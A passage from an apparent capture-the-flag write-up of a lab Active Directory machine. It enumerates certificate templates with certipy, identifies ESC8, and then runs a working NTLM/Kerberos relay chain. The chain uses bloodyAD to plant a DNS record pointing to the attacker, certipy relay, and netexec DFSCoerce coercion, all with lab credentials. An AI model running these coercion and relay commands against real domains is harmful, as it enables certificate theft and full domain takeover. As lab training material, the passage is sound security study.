-rw-rw-rw- 924 Wed Jun 4 08:04:01 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(26).crt
-rw-rw-rw- 1391 Thu Jul 3 10:24:27 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(26-25).crt
-rw-rw-rw- 1391 Thu Jul 3 10:24:27 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(26-27).crt
-rw-rw-rw- 924 Wed Jun 4 08:05:56 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(27).crt
-rw-rw-rw- 1391 Thu Jul 3 10:24:27 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(27-26).crt
-rw-rw-rw- 1391 Thu Jul 3 10:24:27 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(27-28).crt
-rw-rw-rw- 924 Wed Jun 4 08:07:56 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(28).crt
-rw-rw-rw- 1391 Thu Jul 3 10:24:27 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(28-27).crt
-rw-rw-rw- 924 Thu Jul 3 10:25:39 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(29).crt
-rw-rw-rw- 924 Sun Sep 15 07:21:57 2024 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(3).crt
-rw-rw-rw- 1390 Sun Sep 29 03:41:29 2024 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(3-2).crt
-rw-rw-rw- 1390 Sun Sep 29 03:41:29 2024 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(3-4).crt
-rw-rw-rw- 924 Thu Jul 3 10:27:37 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(30).crt
-rw-rw-rw- 924 Thu Jul 3 10:29:36 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(31).crt
-rw-rw-rw- 924 Sun Sep 15 07:24:12 2024 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(4).crt
-rw-rw-rw- 1390 Sun Sep 29 03:41:30 2024 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(4-3).crt
-rw-rw-rw- 1390 Thu Apr 10 02:36:39 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(4-5).crt
-rw-rw-rw- 924 Sun Sep 29 03:43:51 2024 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(5).crt
-rw-rw-rw- 1390 Thu Apr 10 02:36:39 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(5-4).crt
-rw-rw-rw- 1390 Thu Apr 10 02:36:39 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(5-6).crt
-rw-rw-rw- 924 Sun Sep 29 03:44:59 2024 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(6).crt
-rw-rw-rw- 1390 Thu Apr 10 02:36:39 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(6-5).crt
-rw-rw-rw- 1390 Thu Apr 10 02:36:39 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(6-7).crt
-rw-rw-rw- 924 Sun Sep 29 03:46:59 2024 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(7).crt
-rw-rw-rw- 1390 Thu Apr 10 02:36:39 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(7-6).crt
-rw-rw-rw- 1390 Thu Apr 10 02:56:48 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(7-8).crt
-rw-rw-rw- 924 Thu Apr 10 02:40:45 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(8).crt
-rw-rw-rw- 1390 Thu Apr 10 02:56:48 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(8-7).crt
-rw-rw-rw- 1390 Thu Apr 10 02:56:48 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(8-9).crt
-rw-rw-rw- 924 Thu Apr 10 02:42:44 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(9).crt
-rw-rw-rw- 1390 Thu Apr 10 02:56:48 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(9-10).crt
-rw-rw-rw- 1390 Thu Apr 10 02:56:48 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(9-8).crt
-rw-rw-rw- 885 Fri Sep 13 04:50:51 2024 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA.crt
-rw-rw-rw- 331 Fri Sep 13 09:17:59 2024 nsrev_cicada-DC-JPQ225-CA.asp
Getting the most recent certificate:
> get DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(31).crt
└──╼ $openssl x509 -in DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA\(31\).crt -text -noout
Certificate:
Data:
Version: 3 (0x2)
Serial Number:
16:23:75:bb:bb:4c:e5:b0:48:87:bc:bb:c0:87:dd:d1
Signature Algorithm: sha256WithRSAEncryption
Issuer: DC = vl, DC = cicada, CN = cicada-DC-JPQ225-CA
Validity
Not Before: Jul 3 16:19:28 2025 GMT
Not After : Jul 3 16:29:28 2525 GMT
Subject: DC = vl, DC = cicada, CN = cicada-DC-JPQ225-CA
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
Public-Key: (2048 bit)
Modulus:
00:dd:d0:75:49:65:02:13:6f:fb:e4:6f:56:5f:3a:
99:ec:77:db:f5:a9:0b:02:37:1d:44:dd:fa:48:6a:
b2:6a:30:58:9e:d6:b1:f1:26:a1:d5:ff:78:ed:91:
a8:0d:1e:eb:79:70:45:7a:58:3e:dc:bc:8f:98:cd:
99:89:77:0f:2e:87:9f:6f:0c:5a:36:33:5c:c2:48:
48:ae:ce:5a:2f:4f:73:b6:a6:aa:21:6f:c8:7f:40:
e6:e3:23:f6:22:d0:fc:79:ab:51:fa:66:84:c5:a6:
8e:08:0d:aa:48:72:49:6f:ac:cf:6c:92:f2:41:a0:
fc:25:33:e4:73:c9:0c:c0:dd:53:b8:4c:91:64:ab:
2b:3a:ed:15:89:3f:dd:cd:89:90:26:39:b1:4d:68:
b6:4c:46:0c:fe:b0:e3:1e:fd:13:4d:39:67:2c:1a:
63:e9:25:9e:a9:f5:8c:18:67:79:d4:58:87:94:1f:
09:e0:da:2b:f5:74:ef:d8:7b:eb:7d:5d:86:b3:38:
49:5e:16:7f:79:a8:bd:4e:95:ed:f9:a2:bc:d4:0a:
7e:c5:1d:c7:be:76:31:af:da:c4:6d:fc:0c:c4:20:
37:1f:c5:46:de:69:38:e6:da:74:a7:83:33:63:64:
bf:94:d5:bf:2d:dc:e4:b0:e2:18:e5:53:89:56:be:
2e:3d
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage:
Digital Signature, Certificate Sign, CRL Sign
X509v3 Basic Constraints: critical
CA:TRUE
X509v3 Subject Key Identifier:
A2:FD:0C:95:BF:13:0D:99:D3:B5:0B:D2:B4:F5:90:71:C6:E9:9C:91
1.3.6.1.4.1.311.21.1:
.....
1.3.6.1.4.1.311.21.2:
..\.,. ...[....."t*~.z
Signature Algorithm: sha256WithRSAEncryption
Signature Value:
2d:68:ba:5a:00:16:df:6d:5e:e2:d0:57:98:c9:33:c1:20:4b:
34:8a:47:55:e3:66:7d:8e:0c:2a:ad:09:4f:be:b4:d5:2e:51:
09:1c:af:6a:58:0c:1e:d5:dd:34:47:08:66:d9:b1:d1:52:46:
57:27:06:a6:7f:b3:0e:54:39:0b:a7:e5:37:14:30:91:4f:10:
b5:44:f5:05:c5:dc:1f:85:2f:f6:bd:c4:fc:36:d3:58:dc:1a:
45:7e:10:92:aa:f1:6f:cc:fe:2b:1d:2f:04:98:5e:59:b0:05:
e8:da:3e:81:fb:e6:44:46:7b:aa:a7:ce:7e:0e:4c:36:89:e4:
32:5e:0a:49:ef:89:02:48:b0:b2:b7:6e:99:45:74:dc:2a:88:
2a:2e:5f:90:dc:9b:93:fb:0f:9d:ff:03:4c:6b:71:10:28:ef:
15:03:0e:d2:e9:1c:a5:9e:ba:25:c7:8e:32:37:94:25:de:65:
f2:79:6d:e2:b3:49:c9:16:8c:69:49:ef:cb:a5:7c:40:f4:d7:
61:32:d9:4b:0c:45:6c:1b:0f:b0:d1:34:9d:c2:d3:ed:99:09:
e4:a8:4f:0f:f1:10:48:71:84:be:36:6c:f6:b2:41:77:6c:d4:
16:58:f8:19:09:c4:46:a0:cf:46:cc:cf:82:7e:ca:fb:73:6e:
43:b0:c6:a1
Not seeing anything clearly helpful here.
Given the clear focus on certificates here, let’s see if we can find any vulnerable certificate stuff with certipy.
└──╼ $└──╼ $certipy find -k -no-pass -target DC-JPQ225.cicada.vl -dc-ip 10.129.29.26 -ns 10.129.29.26 -enabled
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Trying to get CA configuration for 'cicada-DC-JPQ225-CA' via CSRA
[!] Got error while trying to get CA configuration for 'cicada-DC-JPQ225-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'cicada-DC-JPQ225-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'cicada-DC-JPQ225-CA'
[*] Saved BloodHound data to '20250703135136_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[*] Saved text output to '20250703135136_Certipy.txt'
[*] Saved JSON output to '20250703135136_Certipy.json'
(htb) ┌─[chasepd@THE-HACKINATOR]─[~/htb/vulncicada]
└──╼ $cat 20250703135136_Certipy.json
{
"Certificate Authorities": {
"0": {
"CA Name": "cicada-DC-JPQ225-CA",
"DNS Name": "DC-JPQ225.cicada.vl",
"Certificate Subject": "CN=cicada-DC-JPQ225-CA, DC=cicada, DC=vl",
"Certificate Serial Number": "162375BBBB4CE5B04887BCBBC087DDD1",
"Certificate Validity Start": "2025-07-03 16:19:28+00:00",
"Certificate Validity End": "2525-07-03 16:29:28+00:00",
"Web Enrollment": "Enabled",
"User Specified SAN": "Disabled",
"Request Disposition": "Issue",
"Enforce Encryption for Requests": "Enabled",
"Permissions": {
"Owner": "CICADA.VL\\Administrators",
"Access Rights": {
"2": [
"CICADA.VL\\Administrators",
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
],
"1": [
"CICADA.VL\\Administrators",
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
],
"512": [
"CICADA.VL\\Authenticated Users"
]
}
},
"[!] Vulnerabilities": {
"ESC8": "Web Enrollment is enabled and Request Disposition is set to Issue"
}
}
},
"Certificate Templates": {
"0": {
"Template Name": "KerberosAuthentication",
"Display Name": "Kerberos Authentication",
"Certificate Authorities": [
"cicada-DC-JPQ225-CA"
],
"Enabled": true,
"Client Authentication": true,
"Enrollment Agent": false,
"Any Purpose": false,
"Enrollee Supplies Subject": false,
"Certificate Name Flag": [
"SubjectAltRequireDns",
"SubjectAltRequireDomainDns"
],
"Enrollment Flag": [
"AutoEnrollment"
],
"Private Key Flag": [
"AttestNone"
],
"Extended Key Usage": [
"Client Authentication",
"Server Authentication",
"Smart Card Logon",
"KDC Authentication"
],
"Requires Manager Approval": false,
"Requires Key Archival": false,
"Authorized Signatures Required": 0,
"Validity Period": "1 year",
"Renewal Period": "6 weeks",
"Minimum RSA Key Length": 2048,
"Permissions": {
"Enrollment Permissions": {
"Enrollment Rights": [
"CICADA.VL\\Enterprise Read-only Domain Controllers",
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Domain Controllers",
"CICADA.VL\\Enterprise Admins",
"CICADA.VL\\Enterprise Domain Controllers"
]
},
"Object Control Permissions": {
"Owner": "CICADA.VL\\Enterprise Admins",
"Write Owner Principals": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
],
"Write Dacl Principals": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
],
"Write Property Principals": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
]
}
}
},
"1": {
"Template Name": "DirectoryEmailReplication",
"Display Name": "Directory Email Replication",
"Certificate Authorities": [
"cicada-DC-JPQ225-CA"
],
"Enabled": true,
"Client Authentication": false,
"Enrollment Agent": false,
"Any Purpose": false,
"Enrollee Supplies Subject": false,
"Certificate Name Flag": [
"SubjectAltRequireDns",
"SubjectAltRequireDirectoryGuid"
],
"Enrollment Flag": [
"AutoEnrollment",
"PublishToDs",
"IncludeSymmetricAlgorithms"
],
"Private Key Flag": [
"AttestNone"
],
"Extended Key Usage": [
"Directory Service Email Replication"
],
"Requires Manager Approval": false,
"Requires Key Archival": false,
"Authorized Signatures Required": 0,
"Validity Period": "1 year",
"Renewal Period": "6 weeks",
"Minimum RSA Key Length": 2048,
"Permissions": {
"Enrollment Permissions": {
"Enrollment Rights": [
"CICADA.VL\\Enterprise Read-only Domain Controllers",
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Domain Controllers",
"CICADA.VL\\Enterprise Admins",
"CICADA.VL\\Enterprise Domain Controllers"
]
},
"Object Control Permissions": {
"Owner": "CICADA.VL\\Enterprise Admins",
"Write Owner Principals": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
],
"Write Dacl Principals": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
],
"Write Property Principals": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
]
}
}
},
"2": {
"Template Name": "DomainControllerAuthentication",
"Display Name": "Domain Controller Authentication",
"Certificate Authorities": [
"cicada-DC-JPQ225-CA"
],
"Enabled": true,
"Client Authentication": true,
"Enrollment Agent": false,
"Any Purpose": false,
"Enrollee Supplies Subject": false,
"Certificate Name Flag": [
"SubjectAltRequireDns"
],
"Enrollment Flag": [
"AutoEnrollment"
],
"Private Key Flag": [
"AttestNone"
],
"Extended Key Usage": [
"Client Authentication",
"Server Authentication",
"Smart Card Logon"
],
"Requires Manager Approval": false,
"Requires Key Archival": false,
"Authorized Signatures Required": 0,
"Validity Period": "1 year",
"Renewal Period": "6 weeks",
"Minimum RSA Key Length": 2048,
"Permissions": {
"Enrollment Permissions": {
"Enrollment Rights": [
"CICADA.VL\\Enterprise Read-only Domain Controllers",
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Domain Controllers",
"CICADA.VL\\Enterprise Admins",
"CICADA.VL\\Enterprise Domain Controllers"
]
},
"Object Control Permissions": {
"Owner": "CICADA.VL\\Enterprise Admins",
"Write Owner Principals": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
],
"Write Dacl Principals": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
],
"Write Property Principals": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
]
}
}
},
"3": {
"Template Name": "SubCA",
"Display Name": "Subordinate Certification Authority",
"Certificate Authorities": [
"cicada-DC-JPQ225-CA"
],
"Enabled": true,
"Client Authentication": true,
"Enrollment Agent": true,
"Any Purpose": true,
"Enrollee Supplies Subject": true,
"Certificate Name Flag": [
"EnrolleeSuppliesSubject"
],
"Enrollment Flag": [
"None"
],
"Private Key Flag": [
"ExportableKey"
],
"Requires Manager Approval": false,
"Requires Key Archival": false,
"Authorized Signatures Required": 0,
"Validity Period": "5 years",
"Renewal Period": "6 weeks",
"Minimum RSA Key Length": 2048,
"Permissions": {
"Enrollment Permissions": {
"Enrollment Rights": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
]
},
"Object Control Permissions": {
"Owner": "CICADA.VL\\Enterprise Admins",
"Write Owner Principals": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
],
"Write Dacl Principals": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
],
"Write Property Principals": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
]
}
}
},
"4": {
"Template Name": "WebServer",
"Display Name": "Web Server",
"Certificate Authorities": [
"cicada-DC-JPQ225-CA"
],
"Enabled": true,
"Client Authentication": false,
"Enrollment Agent": false,
"Any Purpose": false,
"Enrollee Supplies Subject": true,
"Certificate Name Flag": [
"EnrolleeSuppliesSubject"
],
"Enrollment Flag": [
"None"
],
"Private Key Flag": [
"AttestNone"
],
"Extended Key Usage": [
"Server Authentication"
],
"Requires Manager Approval": false,
"Requires Key Archival": false,
"Authorized Signatures Required": 0,
"Validity Period": "2 years",
"Renewal Period": "6 weeks",
"Minimum RSA Key Length": 2048,
"Permissions": {
"Enrollment Permissions": {
"Enrollment Rights": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
]
},
"Object Control Permissions": {
"Owner": "CICADA.VL\\Enterprise Admins",
"Write Owner Principals": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
],
"Write Dacl Principals": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
],
"Write Property Principals": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
]
}
}
},
"5": {
"Template Name": "DomainController",
"Display Name": "Domain Controller",
"Certificate Authorities": [
"cicada-DC-JPQ225-CA"
],
"Enabled": true,
"Client Authentication": true,
"Enrollment Agent": false,
"Any Purpose": false,
"Enrollee Supplies Subject": false,
"Certificate Name Flag": [
"SubjectRequireDnsAsCn",
"SubjectAltRequireDns",
"SubjectAltRequireDirectoryGuid"
],
"Enrollment Flag": [
"AutoEnrollment",
"PublishToDs",
"IncludeSymmetricAlgorithms"
],
"Private Key Flag": [
"AttestNone"
],
"Extended Key Usage": [
"Client Authentication",
"Server Authentication"
],
"Requires Manager Approval": false,
"Requires Key Archival": false,
"Authorized Signatures Required": 0,
"Validity Period": "1 year",
"Renewal Period": "6 weeks",
"Minimum RSA Key Length": 2048,
"Permissions": {
"Enrollment Permissions": {
"Enrollment Rights": [
"CICADA.VL\\Enterprise Read-only Domain Controllers",
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Domain Controllers",
"CICADA.VL\\Enterprise Admins",
"CICADA.VL\\Enterprise Domain Controllers"
]
},
"Object Control Permissions": {
"Owner": "CICADA.VL\\Enterprise Admins",
"Write Owner Principals": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
],
"Write Dacl Principals": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
],
"Write Property Principals": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
]
}
}
},
"6": {
"Template Name": "Machine",
"Display Name": "Computer",
"Certificate Authorities": [
"cicada-DC-JPQ225-CA"
],
"Enabled": true,
"Client Authentication": true,
"Enrollment Agent": false,
"Any Purpose": false,
"Enrollee Supplies Subject": false,
"Certificate Name Flag": [
"SubjectRequireDnsAsCn",
"SubjectAltRequireDns"
],
"Enrollment Flag": [
"AutoEnrollment"
],
"Private Key Flag": [
"AttestNone"
],
"Extended Key Usage": [
"Client Authentication",
"Server Authentication"
],
"Requires Manager Approval": false,
"Requires Key Archival": false,
"Authorized Signatures Required": 0,
"Validity Period": "1 year",
"Renewal Period": "6 weeks",
"Minimum RSA Key Length": 2048,
"Permissions": {
"Enrollment Permissions": {
"Enrollment Rights": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Domain Computers",
"CICADA.VL\\Enterprise Admins"
]
},
"Object Control Permissions": {
"Owner": "CICADA.VL\\Enterprise Admins",
"Write Owner Principals": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
],
"Write Dacl Principals": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
],
"Write Property Principals": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
]
}
}
},
"7": {
"Template Name": "EFSRecovery",
"Display Name": "EFS Recovery Agent",
"Certificate Authorities": [
"cicada-DC-JPQ225-CA"
],
"Enabled": true,
"Client Authentication": false,
"Enrollment Agent": false,
"Any Purpose": false,
"Enrollee Supplies Subject": false,
"Certificate Name Flag": [
"SubjectRequireDirectoryPath",
"SubjectAltRequireUpn"
],
"Enrollment Flag": [
"AutoEnrollment",
"IncludeSymmetricAlgorithms"
],
"Private Key Flag": [
"ExportableKey"
],
"Extended Key Usage": [
"File Recovery"
],
"Requires Manager Approval": false,
"Requires Key Archival": false,
"Authorized Signatures Required": 0,
"Validity Period": "5 years",
"Renewal Period": "6 weeks",
"Minimum RSA Key Length": 2048,
"Permissions": {
"Enrollment Permissions": {
"Enrollment Rights": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
]
},
"Object Control Permissions": {
"Owner": "CICADA.VL\\Enterprise Admins",
"Write Owner Principals": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
],
"Write Dacl Principals": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
],
"Write Property Principals": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
]
}
}
},
"8": {
"Template Name": "Administrator",
"Display Name": "Administrator",
"Certificate Authorities": [
"cicada-DC-JPQ225-CA"
],
"Enabled": true,
"Client Authentication": true,
"Enrollment Agent": false,
"Any Purpose": false,
"Enrollee Supplies Subject": false,
"Certificate Name Flag": [
"SubjectRequireDirectoryPath",
"SubjectRequireEmail",
"SubjectAltRequireEmail",
"SubjectAltRequireUpn"
],
"Enrollment Flag": [
"AutoEnrollment",
"PublishToDs",
"IncludeSymmetricAlgorithms"
],
"Private Key Flag": [
"ExportableKey"
],
"Extended Key Usage": [
"Microsoft Trust List Signing",
"Encrypting File System",
"Secure Email",
"Client Authentication"
],
"Requires Manager Approval": false,
"Requires Key Archival": false,
"Authorized Signatures Required": 0,
"Validity Period": "1 year",
"Renewal Period": "6 weeks",
"Minimum RSA Key Length": 2048,
"Permissions": {
"Enrollment Permissions": {
"Enrollment Rights": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
]
},
"Object Control Permissions": {
"Owner": "CICADA.VL\\Enterprise Admins",
"Write Owner Principals": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
],
"Write Dacl Principals": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
],
"Write Property Principals": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
]
}
}
},
"9": {
"Template Name": "EFS",
"Display Name": "Basic EFS",
"Certificate Authorities": [
"cicada-DC-JPQ225-CA"
],
"Enabled": true,
"Client Authentication": false,
"Enrollment Agent": false,
"Any Purpose": false,
"Enrollee Supplies Subject": false,
"Certificate Name Flag": [
"SubjectRequireDirectoryPath",
"SubjectAltRequireUpn"
],
"Enrollment Flag": [
"AutoEnrollment",
"PublishToDs",
"IncludeSymmetricAlgorithms"
],
"Private Key Flag": [
"ExportableKey"
],
"Extended Key Usage": [
"Encrypting File System"
],
"Requires Manager Approval": false,
"Requires Key Archival": false,
"Authorized Signatures Required": 0,
"Validity Period": "1 year",
"Renewal Period": "6 weeks",
"Minimum RSA Key Length": 2048,
"Permissions": {
"Enrollment Permissions": {
"Enrollment Rights": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Domain Users",
"CICADA.VL\\Enterprise Admins"
]
},
"Object Control Permissions": {
"Owner": "CICADA.VL\\Enterprise Admins",
"Write Owner Principals": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
],
"Write Dacl Principals": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
],
"Write Property Principals": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
]
}
}
},
"10": {
"Template Name": "User",
"Display Name": "User",
"Certificate Authorities": [
"cicada-DC-JPQ225-CA"
],
"Enabled": true,
"Client Authentication": true,
"Enrollment Agent": false,
"Any Purpose": false,
"Enrollee Supplies Subject": false,
"Certificate Name Flag": [
"SubjectRequireDirectoryPath",
"SubjectRequireEmail",
"SubjectAltRequireEmail",
"SubjectAltRequireUpn"
],
"Enrollment Flag": [
"AutoEnrollment",
"PublishToDs",
"IncludeSymmetricAlgorithms"
],
"Private Key Flag": [
"ExportableKey"
],
"Extended Key Usage": [
"Encrypting File System",
"Secure Email",
"Client Authentication"
],
"Requires Manager Approval": false,
"Requires Key Archival": false,
"Authorized Signatures Required": 0,
"Validity Period": "1 year",
"Renewal Period": "6 weeks",
"Minimum RSA Key Length": 2048,
"Permissions": {
"Enrollment Permissions": {
"Enrollment Rights": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Domain Users",
"CICADA.VL\\Enterprise Admins"
]
},
"Object Control Permissions": {
"Owner": "CICADA.VL\\Enterprise Admins",
"Write Owner Principals": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
],
"Write Dacl Principals": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
],
"Write Property Principals": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
]
}
}
}
}
}
This is an ESC8 vulnerability! Web Enrollment is enabled, Request Disposition is set to Issue (i.e. the CA automatically issues certificates without requiring approval), any authenticated user can enroll (glances at Rosie.Powell
), and there are no certificate template restrictions.
ESC8 Pwnage for User…and Root
ℹ️
An ESC8 vulnerability is a class of privilege escalation vulnerability that allows a malicious domain user (or compromised domain user) to force a victim machine to authenticate to an attacker controlled one, then relaying the authentication to the vulnerable ADCS web enrollment server to request a certificate. From the Microsoft documentation about this, it says that this can lead to “full domain takeover”. I like the sound of that.
Searching for this vulnerability, apparently this kind of hash reflection is only supposed to be possible from one machine to another, except for with Kerberos. In fact, a group named CICADA8-Research automates this exploit with this: https://github.com/CICADA8-Research/RemoteKrbRelay. Looking at the box name, this seems like we’re probably on the right track.
However, going from Windows is a pain, so luckily there appears to also be this: krbrelayx meant for doing the attack from another angle and from linux only. Looking at what this is doing, we can accomplish roughly the same thing with bloodyAD, certipy, and netexec.
We’ll use bloodyAD to add a new computer to the domain with our IP address (10.10.14.245 here is my attacker IP):
python bloodyAD.py -u Rosie.Powell -p Cicada123 -d cicada.vl -k --host DC-JPQ225.cicada.vl add dnsRecord DC-JPQ225PIZZAMCCHICKEN 10.10.14.245
[+] DC-JPQ225PIZZAMCCHICKEN has been successfully added
Then we’ll start our relay server that we’ll work on getting ADCS to authenticate to:
certipy relay -target 'http://dc-jpq225.cicada.vl/' -template DomainController
Certipy v5.0.3 - by Oliver Lyak (ly4k)
import pkg_resources
[*] Targeting http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp (ESC8)
[*] Listening on 0.0.0.0:445
[*] Setting up SMB Server on port 445
Then we’ll use netexec to attempt to coerce it into authenticating with our server. First we should see what methods netexec thinks will work:
netexec smb DC-JPQ225.cicada.vl -u Rosie.Powell -p Cicada123 -k -M coerce_plus
[*] First time use detected
[*] Creating home directory structure
[*] Creating missing folder logs
[*] Creating missing folder modules
[*] Creating missing folder protocols
[*] Creating missing folder workspaces
[*] Creating missing folder obfuscated_scripts
[*] Creating missing folder screenshots
[*] Creating missing folder logs/sam
[*] Creating missing folder logs/lsa
[*] Creating missing folder logs/ntds
[*] Creating missing folder logs/dpapi
[*] Creating default workspace
[*] Initializing RDP protocol database
[*] Initializing FTP protocol database
[*] Initializing WINRM protocol database
[*] Initializing MSSQL protocol database
[*] Initializing NFS protocol database
[*] Initializing VNC protocol database
[*] Initializing WMI protocol database
[*] Initializing SSH protocol database
[*] Initializing SMB protocol database
[*] Initializing LDAP protocol database
[*] Copying default configuration file
SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 [*] x64 (name:DC-JPQ225) (domain:cicada.vl) (signing:True) (SMBv1:False) (NTLM:False)
SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 [+] cicada.vl\Rosie.Powell:Cicada123
COERCE_PLUS DC-JPQ225.cicada.vl 445 DC-JPQ225 VULNERABLE, DFSCoerce
COERCE_PLUS DC-JPQ225.cicada.vl 445 DC-JPQ225 VULNERABLE, PetitPotam
COERCE_PLUS DC-JPQ225.cicada.vl 445 DC-JPQ225 VULNERABLE, PrinterBug
COERCE_PLUS DC-JPQ225.cicada.vl 445 DC-JPQ225 VULNERABLE, PrinterBug
COERCE_PLUS DC-JPQ225.cicada.vl 445 DC-JPQ225 VULNERABLE, MSEven
Let’s start with the first one and see how it goes.
netexec smb DC-JPQ225.cicada.vl -u Rosie.Powell -p Cicada123 -k -M coerce_plus -o LISTENER=DC-JPQ225PIZZAMCCHICKEN METHOD=DFSCoerce
The exploit appears to succeed:
netexec smb DC-JPQ225.cicada.vl -u Rosie.Powell -p Cicada123 -k -M coerce_plus -o LISTENER=DC-JPQ225PIZZAMCCHICKEN METHOD=DFSCoerce
SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 [*] x64 (name:DC-JPQ225) (domain:cicada.vl) (signing:True) (SMBv1:False) (NTLM:False)
SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 [+] cicada.vl\Rosie.Powell:Cicada123
COERCE_PLUS DC-JPQ225.cicada.vl 445 DC-JPQ225 VULNERABLE, DFSCoerce
COERCE_PLUS DC-JPQ225.cicada.vl 445 DC-JPQ225 Exploit Success, netdfs\NetrDfsRemoveRootTarget
COERCE_PLUS DC-JPQ225.cicada.vl 445 DC-JPQ225 Exploit Success, netdfs\NetrDfsAddStdRoot
